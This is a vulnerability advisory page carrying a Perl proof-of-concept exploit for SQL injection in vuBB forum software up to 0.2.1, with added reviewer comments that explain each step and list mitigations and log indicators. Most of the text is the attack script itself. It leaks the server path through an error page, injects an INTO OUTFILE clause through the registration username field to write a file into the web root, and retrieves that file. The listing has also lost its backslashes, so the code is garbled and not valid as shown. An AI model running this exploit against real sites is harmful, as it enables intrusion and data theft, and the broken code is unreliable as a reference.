vuBB <= 0.2.1 [BFA] SQL Injection Exploit + Advisory link

2006.12.05
Credit: DarkFig
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89

#!/usr/bin/perl
#
# by DarkFig -- acid-root.new.fr
# French Advisory (vuBB <= 0.2.1 [BFA] SQL Injection, XSS, CRLF Injection, Full Path Disclosure): http://www.acid-root.new.fr/advisories/vubb021b.txt
#
# Reviewer summary (defensive reading of this proof-of-concept):
#   1. It requests includes/vubb.php directly and scrapes the server's
#      filesystem path out of the error text that comes back (full path
#      disclosure).
#   2. It posts a registration form to index.php?act=register&action=register
#      whose "user" field carries a quote, an INTO OUTFILE clause pointing at
#      the disclosed path, and a trailing comment marker (CWE-89). Presumably
#      the application places "user" unescaped into a SELECT -- the query
#      itself is not shown on this page.
#   3. It fetches the file the database was asked to write and stores it
#      locally as VUBB_RESULT.txt.
#
# What a defender should take from it:
#   - Bind the registration "user" value as a query parameter instead of
#     concatenating it into SQL.
#   - Step 2 depends on the database account being allowed to write files
#     into a web-served directory; removing the FILE privilege from the
#     application's account or restricting where the server may write
#     (e.g. MySQL's secure_file_priv) breaks it even if the injection remains.
#   - Step 1 depends on error messages being shown to clients and on include
#     files being directly requestable; disable error display in production
#     and deny direct access to includes/.
#   - Log indicators visible in this script: direct GETs of includes/vubb.php,
#     registration POSTs whose body contains "%27+INTO+OUTFILE+%27", and an
#     unexpected thisismypasswd.txt under the forum path.
#
# NOTE(review): this listing appears to have lost its backslashes in
# extraction (string escapes and regex delimiters), so it is not valid Perl as
# shown. It is kept as published; only comments and line breaks were added.
#
use IO::Socket;
use LWP::Simple;

# Header
print "rn+---------------------------------------+", "rn";
print "| vuBB <= 0.2.1 [BFA] SQL Injection -|", "rn";
print "+---------------------------------------+", "rn";

# Usage: three positional arguments are required (host, path, username).
if(!$ARGV[2]){
print "| Usage: <host> <path> <username> ------|", "rn";
print "+---------------------------------------+", "rn";
exit;
}

# Host: accept either a bare host name or a URL with the scheme in front.
if($ARGV[0] =~ /http://(.*)/){ $host = $1; } else { $host = $ARGV[0]; }
print "[+]Host: $hostrn";

# Var
my $path = $ARGV[1];
my $user = $ARGV[2];
print "[+]User: $userrn";
my $port = 80;
# URL of the include file requested directly in the path-disclosure step.
my $fpd = "http://".$host.$path."includes/vubb.php";
my $err1 = "[-]Can't connect to the hostrn";
my $err2 = "[-]Can't retrieve the full pathrn";
my $err3 = "[-]Can't retrieve the resultsrn";
# Request line for the registration POST (the vulnerable endpoint).
my $poti = "POST "."$path"."index.php?act=register&action=register"." 
HTTP/1.1";

# Full Path Disclosure
# The response to a direct request for the include file is expected to contain
# an error message naming the file's absolute path ("in <b>...</b>" looks like
# PHP's HTML error format -- presumably display_errors is on; confirm).
# `die print ...` throws after printing, so end() is never reached on this path.
$req0 = get($fpd) or die print $err1 and end();
if($req0 =~ /in <b>(.*)/includes/vubb.php</b>/) {
# The captured directory becomes the target of the INTO OUTFILE clause below.
$fullpath = $1."/thisismypasswd.txt";
print "[+]Path: $1rn";
} else { print $err2 and end(); }

# Malicious data
# Form body for the registration request. %27 is a single quote and %23 is '#',
# so the "user" value closes the string it is placed in, appends
# INTO OUTFILE '<fullpath>' and comments out the rest of the statement.
# The remaining fields are filler so the form is accepted.
my $pdat = "user=$user"."%27+INTO+OUTFILE+%27"."$fullpath"."%27%23"."&email=a669c45 70f%40hotmail.com&vemail=a669c4570f%40hotmail.com&pass=mypassword&vpass= mypassword&agreement=iacceptohackit&agree=on";
my $ldat = length $pdat;

# The POST is written over a raw TCP socket to port 80; the response is never
# read -- the script only checks for the written file afterwards.
my $req1 = IO::Socket::INET->new(
PeerAddr => $host,
PeerPort => $port,
Proto => "tcp"
) or print $err1 and end();

print $req1 "$poti", "rn";
print $req1 "Host: $host", "rn";
print $req1 "Content-Type: application/x-www-form-urlencoded", "rn";
print $req1 "Content-Length: $ldat", "rnn";
print $req1 "$pdat", "rn";
close($req1);

# Results
# Retrieves the file the database was asked to write. If it is reachable over
# HTTP, the database server was able to write into the web root.
$req2 = get("http://".$host.$path."/thisismypasswd.txt") or print $err3 and end();
# Two-argument open with a bareword handle; the result is not checked, so a
# failure to create the local file goes unnoticed.
open(f, ">VUBB_RESULT.txt");
print f $req2;
close(f);
print "[+]Done: VUBB_RESULT.txtrn";
end();

# Bye: print the closing banner line and exit.
sub end {
print "+---------------------------------------+", "rn";
exit;
}

